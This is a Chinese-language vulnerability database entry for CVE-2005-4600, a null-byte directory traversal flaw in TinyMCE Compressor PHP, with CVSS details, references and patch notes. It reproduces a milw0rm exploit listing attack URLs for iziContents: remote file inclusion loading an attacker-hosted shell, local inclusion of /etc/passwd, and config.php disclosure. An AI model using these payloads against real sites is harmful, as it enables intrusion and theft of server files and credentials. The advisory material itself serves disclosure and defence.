CVE-2005-4600
CVSS6.4
发布时间 :2005-12-31 00:00:00
修订时间 :2008-09-05 16:57:17
NMCOE    

[原文]Directory traversal vulnerability in tiny_mce_gzip.php in TinyMCE Compressor PHP before 1.06 allows remote attackers to read or include arbitrary files via a trailing null byte (%00) in the (1) theme, (2) language, (3) plugins, or (4) lang parameter.


[CNNVD]TinyMCE Compressor多个目录遍历漏洞(CNNVD-200512-640)

        TinyMCE Compressor PHP的1.06之前版本中的tiny_mce_gzip.php使得远程攻击者可以通过在(1)主题,(2)语言,(3)插件或(4)lang参数中的结尾空字节(%00)读取或包含任意文件。

- CVSS (基础分值)

CVSS分值: 6.4 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-22 [对路径名的限制不恰当(路径遍历)]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4600
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-4600
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200512-640
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/16083
(PATCH)  BID  16083
http://tinymce.moxiecode.com/punbb/viewtopic.php?id=2233
(PATCH)  CONFIRM  http://tinymce.moxiecode.com/punbb/viewtopic.php?id=2233
http://secunia.com/advisories/18262
(VENDOR_ADVISORY)  SECUNIA  18262
http://xforce.iss.net/xforce/xfdb/36736
(UNKNOWN)  XF  izicontents-tinymcegzip-directory-traversal(36736)
http://www.securityfocus.com/archive/1/archive/1/420543/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20051229 Advisory 26/2005: TinyMCE Compressor Vulnerabilities
http://www.osvdb.org/22116
(UNKNOWN)  OSVDB  22116
http://www.milw0rm.com/exploits/4441
(UNKNOWN)  MILW0RM  4441
http://www.hardened-php.net/advisory_262005.111.html
(VENDOR_ADVISORY)  MISC  http://www.hardened-php.net/advisory_262005.111.html
http://tinymce.moxiecode.com/punbb/viewtopic.php?id=2244
(UNKNOWN)  CONFIRM  http://tinymce.moxiecode.com/punbb/viewtopic.php?id=2244
http://securitytracker.com/id?1015424
(UNKNOWN)  SECTRACK  1015424
http://securityreason.com/securityalert/306
(UNKNOWN)  SREASON  306

- 漏洞信息

TinyMCE Compressor多个目录遍历漏洞
中危 输入验证
2005-12-31 00:00:00 2006-01-03 00:00:00
远程  
        TinyMCE Compressor PHP的1.06之前版本中的tiny_mce_gzip.php使得远程攻击者可以通过在(1)主题,(2)语言,(3)插件或(4)lang参数中的结尾空字节(%00)读取或包含任意文件。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        http://tinymce.moxiecode.com/download.php

- 漏洞信息 (4441)

iziContents <= RC6 (RFI/LFI) Multiple Remote Vulnerabilities (EDBID:4441)
php webapps
2007-09-21 Verified
0 irk4z
N/A [点击下载]
#                                      o      [bug]     /"*._         _        #
#                 .                     .    .      .-*'`    `*-.._.-'/        #
#                                   o       o     < * ))     ,       (         #
#                            .           o          `*-._`._(__.--*"`.\        #
#                                                                              #
# vuln.: iziContents <= RC6 (RFI/LFI) Multiple Remote Vulnerabilities          #
# author: irk4z@yahoo.pl                                                       #
# download:                                                                    #
#   http://www.izicontents.com/download/iziContents1RC6.zip                    #
#                                                                              #
# greetz: cOndemned, kacper ;>                                                 #


# remote file inclusion:
 http://[site]/[path]/modules/search/search.php?language_home=&rootdp=zZz&gsLanguage=http://[shell]?
 http://[site]/[path]/modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=http://[shell]?
 http://[site]/[path]/modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage=http://[shell]?
 http://[site]/[path]/modules/links/showlinks.php?language_home=&rootdp=zZz&gsLanguage=http://[shell]?
 http://[site]/[path]/modules/links/submit_links.php?rootdp=zZz&gsLanguage=http://[shell]? 
 
# local file inclusion:
 http://[site]/[path]/modules/poll/poll_summary.php?rootdp=zZz&admin_home=/etc/passwd%00
 http://[site]/[path]/include/db.php?rootdp=/etc/passwd%00
 
# remote file disclosure:
 http://[site]/[path]/include/tinymce/tiny_mce_gzip.php?theme=../../config.php%00

# milw0rm.com [2007-09-21]
		

- 漏洞信息

22116
TinyMCE Compressor tiny_mce_gzip.php Traversal Arbitrary File Access
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality
Exploit Public, Exploit Unknown Vendor Verified

- 漏洞描述

TinyMCE Compressor contains a flaw that allows a remote attacker to view fieles outside of the web path. The issue is due to the tiny_mce_gzip.php script not sanitizing input to the 'theme', 'language', 'plugins', or 'lang parameter'. By requesting a file and appending a null byte (%00), an attacker can access any file on the system that the web server has privileges to read.

- 时间线

2005-12-29 2005-12-27
Unknow Unknow

- 解决方案

Upgrade to version 1.0.6 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站